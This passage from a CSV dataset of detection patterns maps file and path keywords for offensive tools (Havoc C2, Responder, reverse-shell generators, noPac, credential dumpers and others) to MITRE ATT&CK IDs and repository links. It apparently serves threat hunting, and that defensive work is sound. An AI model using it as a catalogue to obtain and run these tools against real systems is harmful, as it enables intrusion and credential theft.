T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/RemotePotato0.git*",".{0,1000}\/RemotePotato0\.git.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*/RemotePotato0.zip*",".{0,1000}\/RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*/remotereg.c*",".{0,1000}\/remotereg\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remotereg.o*",".{0,1000}\/remotereg\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*/request_shellcode.exe*",".{0,1000}\/request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/resolveall.nse*",".{0,1000}\/resolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/resources/PROCEXP.sys*",".{0,1000}\/resources\/PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/resources/selfdestruction*",".{0,1000}\/resources\/selfdestruction.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/Responder.git*",".{0,1000}\/Responder\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/responder/Responder.conf *",".{0,1000}\/responder\/Responder\.conf\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Responder-master.zip*",".{0,1000}\/Responder\-master\.zip.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/restoresig.py*",".{0,1000}\/restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*/returnvar/wce/*",".{0,1000}\/returnvar\/wce\/.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/rev_shell.py*",".{0,1000}\/rev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/Reverse Shell Tab -->*",".{0,1000}\/Reverse\sShell\sTab\s\-\-\>.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/reverse.exe*",".{0,1000}\/reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/reverse-index.nse*",".{0,1000}\/reverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/reverseShell-1.0.1-zip.zip*",".{0,1000}\/reverseShell\-1\.0\.1\-zip\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*/reverse-shellcode.cpp*",".{0,1000}\/reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/reverse-shell-generator*",".{0,1000}\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2703","579","2024-04-18T18:05:44Z","2021-02-27T00:53:13Z" "*/reverse-shell-generator.git*",".{0,1000}\/reverse\-shell\-generator\.git.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/reverse-ssh.git*",".{0,1000}\/reverse\-ssh\.git.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh/*",".{0,1000}\/reverse\-ssh\/.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh-armv7-x86*",".{0,1000}\/reverse\-ssh\-armv7\-x86.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh-armv8-x64*",".{0,1000}\/reverse\-ssh\-armv8\-x64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-sshx64*",".{0,1000}\/reverse\-sshx64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/ReverseTCPShell*",".{0,1000}\/ReverseTCPShell.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/Rev-Shell.git*",".{0,1000}\/Rev\-Shell\.git.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/revshell.py*",".{0,1000}\/revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*/revshell32.bin*",".{0,1000}\/revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/revshell64.bin*",".{0,1000}\/revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/revshells.com*",".{0,1000}\/revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/rexec-brute.nse*",".{0,1000}\/rexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfc868-time.nse*",".{0,1000}\/rfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfs_injection.exe*",".{0,1000}\/rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/RGPerson.py*",".{0,1000}\/RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/riak-http-info.nse*",".{0,1000}\/riak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ricardojba/Invoke-noPac*",".{0,1000}\/ricardojba\/Invoke\-noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","59","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*/ricardojba/noPac*",".{0,1000}\/ricardojba\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*/rid_hijack.*",".{0,1000}\/rid_hijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rid_hijack.py*",".{0,1000}\/rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*/ridenum/ridenum.py*",".{0,1000}\/ridenum\/ridenum\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/RID-Hijacking.git*",".{0,1000}\/RID\-Hijacking\.git.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*/Ridter/noPac*",".{0,1000}\/Ridter\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*/rlogin-brute.nse*",".{0,1000}\/rlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rm_injection.exe*",".{0,1000}\/rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rmi-dumpregistry.nse*",".{0,1000}\/rmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-vuln-classloader.nse*",".{0,1000}\/rmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ROADtools/*",".{0,1000}\/ROADtools\/.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RoguePotato.git*",".{0,1000}\/RoguePotato\.git.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*/RogueWinRM.git*",".{0,1000}\/RogueWinRM\.git.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - 